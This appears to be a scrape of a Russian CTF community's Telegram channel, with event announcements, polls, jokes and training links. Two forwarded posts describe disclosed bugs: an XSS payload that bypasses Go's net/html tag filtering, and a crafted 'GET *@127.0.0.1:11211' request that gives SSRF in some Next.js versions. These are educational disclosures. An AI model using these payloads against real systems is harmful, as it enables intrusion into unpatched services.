ККСики решили всех на место поставить под конец...
Итоговая борда выглядит примерно так (p.s. амничики почти на нее попали...😭)
#event
Итоговая борда выглядит примерно так (p.s. амничики почти на нее попали...😭)
#event
❤6
Forwarded from Заметки Слонсера (Slonser)
Недавно нашел обход фильтрации тегов в golang.
Для строки
То есть он будет думать что у нас есть только ссылка на google.com
В тоже время в браузере вы увидите, что у нас загрузился тег <img> и всплыл popup alert
Баг существует в предпоследней версии golang и был исправлен в последнем релизе.
P.S. Если что исправлено 5 дней назад https://github.com/golang/net/commit/643fd162e36ae58085b92ff4c0fec0bafe5a46a7
Для строки
<a/href/='https://google.com/#><img src=x onerror=alert()>slon</img></h1>'>google</a>
, golang net/html увидит следующий DOM:html
head
body
a
->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1>
То есть он будет думать что у нас есть только ссылка на google.com
В тоже время в браузере вы увидите, что у нас загрузился тег <img> и всплыл popup alert
Баг существует в предпоследней версии golang и был исправлен в последнем релизе.
P.S. Если что исправлено 5 дней назад https://github.com/golang/net/commit/643fd162e36ae58085b92ff4c0fec0bafe5a46a7
🤯4❤🔥1
У меня для вас очень важный и инетерсный вопрос - как вы вообще относитесь к формату attack&defence?
Anonymous Poll
10%
Много играю, развиваюсь в этом направлении
23%
Немного играл, хочу продолжать развиваться
63%
Никогда не играл, но хотел бы попробовать
3%
Не интересно
Так, обстановочку в канале поняли, поэтому потихоничку начнем вас готовить😉
Статья о том, что такое AD, и с чем его едят. Написана она самыми опытными CTF-ерами в России для самых маленьких в этой сфере (две трети канала емае)
#learn #ctf #attackdefence
Статья о том, что такое AD, и с чем его едят. Написана она самыми опытными CTF-ерами в России для самых маленьких в этой сфере (две трети канала емае)
#learn #ctf #attackdefence
cbsctf.ru
Attack-Defense для новичков
Что такое Attack-Defense CTF и как в это играть
❤3
Forwarded from kerable
Великий реверсер, ведущий исследователь безопасности каждый раз, когда приходил в офис, начинал свой день с ритуала: открывал файл в блокноте и смотрел туда минуту, закрывал и начинал работать. Однажды он уволился и его коллеги решили посмотреть что это за файл, открыли его в блокноте, а там надпись: пролог в начале, эпилог в конце.
🔥2🥰2
Forwarded from MEPhI CTF (Pavel Blinnikov)
Первая лекция по криптографии
Введение в угрожающе умный мир от Александра Соколова уже ожидает вас на YouTube
Введение в угрожающе умный мир от Александра Соколова уже ожидает вас на YouTube
YouTube
Криптография №1. Социальная криптография | Кружок CTF МИФИ&BI.ZONE
Записи встреч CTF-кружка, проводимого при сотрудничестве НИЯУ МИФИ и компании BI.ZONE. В тринадцатом видео Александр Соколов, студент 4 курса кафедры, участник CTF-команды SPRUSH и консультант по безопасности в компании Aztec, рассказывает про историю криптографии…
❤2
Forwarded from GEOINT (2 2)
#QUIZ62
#OSINT #GEOINT
https://www.youtube.com/watch?v=D8YBhEs2mLo
Тренировка.
Найти место, где находился дирижёр в видео (координаты или отметка на карте).
*//*
Training.
Find the place where the conductor was in the video (coordinates or mark on the map).
#OSINT #GEOINT
https://www.youtube.com/watch?v=D8YBhEs2mLo
Тренировка.
Найти место, где находился дирижёр в видео (координаты или отметка на карте).
*//*
Training.
Find the place where the conductor was in the video (coordinates or mark on the map).
🥰2
Сегодня в 15.00 начнется bi0sCTF, всем советуем порешать, будут хорошие таски!
ctftime.org
bi0sCTF 2024
Team bi0s invites you to our prestigious bi0sCTF 2024, a premier hacking event designed for hackers of all generation...
❤5
КибХак CTF
Сегодня в 15.00 начнется bi0sCTF, всем советуем порешать, будут хорошие таски!
как вам тасочки?)
🖕3❤2
Forwarded from Кавычка (Bo0oM)
Есть такая штука
Собственно именно это место нас и интересует.
В
А самое важное тут то, что http-парсер
Ну и последнее: код который формирует url для проксирования внутрь
Но что более важное - это SSRF с возможностью чтения ответа: если внутри, в инфре, есть приватная веб-морда, мы можем спокойно обращаться к ней, как будь то бы она торчит наружу.
Уязвимые версии:
Из интересного: vercel отказал в CVE, так как не считает что это уязвимость (на момент репорта уязвимость воспроизводилась в последних версиях). Однако с версии
>
nextjs
, несколько месяцев назад они добавили новую "фишку" распределение нагрузки - под капотом поднимается несколько микросервисов. Каждый из которых занимается своей частью обработки запроса. Работает все примерно так-же как и обычный прокси сервер, запрос приходит, обрабатывается, и через стороннюю библиотеку проксируется на другой порт.Собственно именно это место нас и интересует.
В
HTTP
есть такой метод PRI
(используются, если мне не изменяет память, чтобы проверить возможность HTTP/2
подключения). Нас интересует что запросы этого метода имеют cимвол *
в пути, вместо привычного /
.PRI * HTTP/1.1.Далее, все http-парcеры работают по разному, у
nodejs
он немного особенный, и url вида http://example.com:3456*@127.0.0.1:8080
будет разобран как: hostname
: 127.0.0.1
, port
: 8080
, auth
: example.com:3456*
,А самое важное тут то, что http-парсер
nodejs
считает валидными запросы вида:GET *@127.0.0.1/ HTTP/1.1А знаете кто еще так делает - haproxy!
Host: somehost
Ну и последнее: код который формирует url для проксирования внутрь
nextjs
выглядит так:const targetUrl = `http://${Собственно, т.к. мы контролируем
targetHost === 'localhost' ? '127.0.0.1' : targetHost
}:${routerPort}${pathname}`
pathname
- мы можем отправить запрос вида:GET *@127.0.0.1:11211 HTTP/1.1и запрос уйдет напрямую в memcached, получаем SSRF.
Host: some
Но что более важное - это SSRF с возможностью чтения ответа: если внутри, в инфре, есть приватная веб-морда, мы можем спокойно обращаться к ней, как будь то бы она торчит наружу.
Уязвимые версии:
>= 13.3.0 | <=13.4.12
фича проксирования включена по умолчанию, она так же включается если установлен флаг appDir: true
в конфигурации experimental
.Из интересного: vercel отказал в CVE, так как не считает что это уязвимость (на момент репорта уязвимость воспроизводилась в последних версиях). Однако с версии
13.4.13
изменили код. Теперь в части внутренних запросов используется fetch
. Что дает некоторую защиту, т.к. fetch не принимает запросы содержащие авторизацию.>
❤5
Статья, посвященная цтф тулзятинам. А еще мне очень понравился раздел с райтапами за последние много-много лет
В общем, интересно, гляньте
В общем, интересно, гляньте
Форум информационной безопасности - Codeby.net
Великий CTF: Инструменты и утилиты для хакеров
Список лучших инструментов для CTF: утилиты, пособия и софт для решения задач по информационной безопасности. Стань экспертом в Capture the Flag!
❤2
Forwarded from VolgaCTF
Мы знаем толк в закрытых-открытых дверях! Поэтому
открываем регистрацию на VolgaCTF Qualifier 2024.
Соревнования пройдут 30-31 марта 2024 года. Топ команд получит возможность попасть в финал VolgaCTF 2024, который состоится в Самаре в сентябре.
Правила участия и регистрация доступны тут.
Джойн и энжой!
открываем регистрацию на VolgaCTF Qualifier 2024.
Соревнования пройдут 30-31 марта 2024 года. Топ команд получит возможность попасть в финал VolgaCTF 2024, который состоится в Самаре в сентябре.
Правила участия и регистрация доступны тут.
Джойн и энжой!
Forwarded from SHADOW:Group
Статья об эксплуатации SSRF, которую обнаружили и успешно использовали в одном из продуктов искусственного интеллекта от Microsoft.
Ссылка на статью
#web #ssrf #ai
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
SSRF в Microsoft Designer
Сегодня я расскажу о эксплуатации SSRF (Server-Side Request Forgery), которую обнаружили и успешно использовали в одном из продуктов искусственного интеллекта Microsoft, а именно Microsoft Designer. Microsoft Designer - это приложение для графического дизайна…
❤1
Пора тренироваться!
Друзья, мы подняли для вас платформу для тренировок, на ней переодически будут появляться как задачки с прошлых годов, так и новые таски 🚩
Например, сейчас мы выложили первые задания для самых маленьких в рамках обучения в КибХак Школе CTF. Скорее беги смотреть!
Тык.
Друзья, мы подняли для вас платформу для тренировок, на ней переодически будут появляться как задачки с прошлых годов, так и новые таски 🚩
Например, сейчас мы выложили первые задания для самых маленьких в рамках обучения в КибХак Школе CTF. Скорее беги смотреть!
Тык.
❤13
Огромное спасибо всем, кто пришел сегодня на занятие! Вы классная публика!❤️
К следующему занятию постараемся получше подстроиться под ваш уровень навыков, для этого, пожалуйста, дайте небольшой фидбек по сложности и вашей вовлеченности.
P.S. Таски поднимем в ближайшее время, все смогут еще раз попробовать их решить и сдать флаги) Также добавим несколько заданий с прошлых лет CybHack CTF
К следующему занятию постараемся получше подстроиться под ваш уровень навыков, для этого, пожалуйста, дайте небольшой фидбек по сложности и вашей вовлеченности.
P.S. Таски поднимем в ближайшее время, все смогут еще раз попробовать их решить и сдать флаги) Также добавим несколько заданий с прошлых лет CybHack CTF
❤22
Переподняли тасочки
Если опять отвалятся, пингуйте!
Ну и совет вам - на питоне не пишите, развалится...
Если опять отвалятся, пингуйте!
Ну и совет вам - на питоне не пишите, развалится...
😁8
Forwarded from MEPhI CTF (Pavel Blinnikov)
16 марта стартует NeoQUEST - индивидуальный CTF, проводимый с 2012 года Питерским Политехом!
NeoQUEST содержит два трека – для взрослых и для школьников
Все победители получат призы, подарки, почет и уважение! Победителей взрослого трека организаторы пригласят на оффлайн-этап в Санкт-Петербурге в сентябре.
NeoQUEST содержит два трека – для взрослых и для школьников
Все победители получат призы, подарки, почет и уважение! Победителей взрослого трека организаторы пригласят на оффлайн-этап в Санкт-Петербурге в сентябре.
ВКонтакте
NeoQUEST
🦉NeoQUEST - ежегодное мероприятие, посвященное вопросам кибербезопасности, которое традиционно проходит в два этапа: 📌 online-этап – удаленное индивидуальное CTF-соревнование, проходящее в течение двух недель во второй половине марта; 🧠 +5 баллов к результатам…
❤4
Всем доброго вечера!
Хотелось бы сказать несколько моментов:
1) Пишите тут в чатик по любому возникшему вопросу (даже если вам кажется, что он совсем глупый и простой), комунити у нас доброе: поможем, расскажем, покажем.
2) Если у кого-то есть то, что он хотел бы узнать на следующем занятии по ВЭБУ (или что-то не понял с предыдущего занятия и хочет, чтобы мы повторили это еще разок), опять же вэлкам либо в чатик либо в коменты к этому посту. Сильно постраемся включить ваши пожелания в нашу программу :)
P.S
Следующее занятие по web'чику пройдет в субботу 16.02 в 18.00
Хотелось бы сказать несколько моментов:
1) Пишите тут в чатик по любому возникшему вопросу (даже если вам кажется, что он совсем глупый и простой), комунити у нас доброе: поможем, расскажем, покажем.
2) Если у кого-то есть то, что он хотел бы узнать на следующем занятии по ВЭБУ (или что-то не понял с предыдущего занятия и хочет, чтобы мы повторили это еще разок), опять же вэлкам либо в чатик либо в коменты к этому посту. Сильно постраемся включить ваши пожелания в нашу программу :)
P.S
Следующее занятие по web'чику пройдет в субботу 16.02 в 18.00
👍8❤5